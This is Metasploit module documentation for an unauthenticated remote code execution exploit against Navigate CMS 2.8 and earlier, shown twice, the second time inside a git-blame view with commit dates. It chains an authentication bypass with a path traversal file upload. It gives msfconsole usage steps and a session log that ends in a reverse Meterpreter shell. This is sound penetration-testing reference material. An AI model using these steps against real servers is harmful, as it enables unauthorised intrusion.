documentation/modules/exploit/multi/http/navigate_cms_rce.md

## Description

This module exploits insufficient sanitization in the database::protect method, of Navigate CMS versions 2.8 and prior, to bypass authentication.
It then uses a path traversal vulnerability in navigate_upload.php that allows authenticated users to upload PHP files to arbitrary locations.
Together these vulnerabilities allow an unauthenticated attacker to execute arbitrary PHP code remotely.

This module was tested against Navigate CMS 2.8.

## Verification Steps

[Navigate CMS 2.8](https://master.dl.sourceforge.net/project/navigatecms/releases/navigate-2.8r1302.zip)

## Verification Steps

1. Install Navigate CMS
2. Start `msfconsole`
3. `use exploit/multi/http/navigate_cms_rce`
4. `set RHOST <rhost>`
5. `check`
6. You should see `The target appears to be vulnerable.`
7. `exploit`
8. You should get a meterpreter session

## Scenarios

### Navigate CMS on Ubuntu 18.04

```
msf5 > use exploit/multi/http/navigate_cms_rce
msf5 exploit(multi/http/navigate_cms_rce) > set RHOST 192.168.178.45
RHOST => 192.168.178.45
msf5 exploit(multi/http/navigate_cms_rce) > check
[*] 192.168.178.45:80 The target appears to be vulnerable.
msf5 exploit(multi/http/navigate_cms_rce) > exploit

[*] Started reverse TCP handler on 192.168.178.35:4444 
[+] Login bypass successful
[+] Upload successful
[*] Triggering payload...
[*] Sending stage (37775 bytes) to 192.168.178.45
[*] Meterpreter session 1 opened (192.168.178.35:4444 -> 192.168.178.45:52720) at 2018-09-26 22:24:59 +0200

meterpreter > 
```
Add documentation for Navigate CMS Unauthenticated Remote Code Execution 2018-09-26 22:37:16 +02:00			`## Description`

Refactor 2018-09-27 11:09:07 +02:00			`This module exploits insufficient sanitization in the database::protect method, of Navigate CMS versions 2.8 and prior, to bypass authentication.`
			`It then uses a path traversal vulnerability in navigate_upload.php that allows authenticated users to upload PHP files to arbitrary locations.`
			`Together these vulnerabilities allow an unauthenticated attacker to execute arbitrary PHP code remotely.`
Minor modifications 2018-10-02 06:57:04 -05:00
Refactor 2018-09-27 11:09:07 +02:00			`This module was tested against Navigate CMS 2.8.`
Add documentation for Navigate CMS Unauthenticated Remote Code Execution 2018-09-26 22:37:16 +02:00
module options to options 2020-01-16 10:49:22 -05:00			`## Verification Steps`
Add documentation for Navigate CMS Unauthenticated Remote Code Execution 2018-09-26 22:37:16 +02:00
			`[Navigate CMS 2.8](https://master.dl.sourceforge.net/project/navigatecms/releases/navigate-2.8r1302.zip)`

			`## Verification Steps`

			`1. Install Navigate CMS`
			2. Start `msfconsole`
			3. `use exploit/multi/http/navigate_cms_rce`
			4. `set RHOST <rhost>`
			5. `check`
			6. You should see `The target appears to be vulnerable.`
			7. `exploit`
			`8. You should get a meterpreter session`

			`## Scenarios`

			`### Navigate CMS on Ubuntu 18.04`

			```
			`msf5 > use exploit/multi/http/navigate_cms_rce`
			`msf5 exploit(multi/http/navigate_cms_rce) > set RHOST 192.168.178.45`
			`RHOST => 192.168.178.45`
			`msf5 exploit(multi/http/navigate_cms_rce) > check`
			`[*] 192.168.178.45:80 The target appears to be vulnerable.`
			`msf5 exploit(multi/http/navigate_cms_rce) > exploit`

			`[*] Started reverse TCP handler on 192.168.178.35:4444`
			`[+] Login bypass successful`
			`[+] Upload successful`
			`[*] Triggering payload...`
			`[*] Sending stage (37775 bytes) to 192.168.178.45`
			`[*] Meterpreter session 1 opened (192.168.178.35:4444 -> 192.168.178.45:52720) at 2018-09-26 22:24:59 +0200`

			`meterpreter >`
			```